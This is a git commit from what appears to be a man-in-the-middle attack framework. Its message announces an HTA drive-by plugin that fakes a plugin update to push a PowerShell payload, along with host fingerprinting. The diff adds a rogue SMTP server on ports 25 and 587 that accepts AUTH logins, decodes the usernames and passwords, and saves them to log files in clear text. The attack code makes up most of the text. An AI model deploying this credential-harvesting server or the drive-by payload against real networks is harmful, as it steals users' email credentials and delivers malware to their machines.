This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-07-12 08:07:11 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/core/responder/smtp/SMTPserver.py
+++ b/core/responder/smtp/SMTPserver.py
@ -0,0 +1,64 @@
+import logging
+import threading
+
+from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from base64 import b64decode
+from SMTPPackets import *
+from core.responder.common import *
+from core.logger import logger
+
+formatter = logging.Formatter("%(asctime)s [SMTPserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("SMTPserver", formatter)
+
+class SMTPserver():
+
+	def serve_thread_tcp(self, port):
+		try:
+			server = ThreadingTCPServer(("0.0.0.0", port), ESMTP)
+			server.serve_forever()
+		except Exception as e:
+			log.error("Error starting TCP server on port {}: {}".format(port, e))
+
+	#Function name self-explanatory
+	def start(self):
+		log.debug("online")
+		t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=(25,))
+		t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=(587,))
+		
+		for t in [t1, t2]:
+			t.setDaemon(True)
+			t.start()
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#ESMTP server class.
+class ESMTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.send(str(SMTPGreating()))
+			data = self.request.recv(1024)
+			if data[0:4] == "EHLO":
+				self.request.send(str(SMTPAUTH()))
+				data = self.request.recv(1024)
+			if data[0:4] == "AUTH":
+				self.request.send(str(SMTPAUTH1()))
+				data = self.request.recv(1024)
+				if data:
+					Username = b64decode(data[:len(data)-2])
+					self.request.send(str(SMTPAUTH2()))
+					data = self.request.recv(1024)
+					if data:
+						Password = b64decode(data[:len(data)-2])
+						Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
+						WriteData(Outfile,Username+":"+Password, Username+":"+Password)
+						#print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
+						log.info("{} SMTP User: {} Pass:{} ".format(self.client_address[0],Username,Password))
+
+		except Exception as e:
+			log.error("Error handling request: {}".format(e))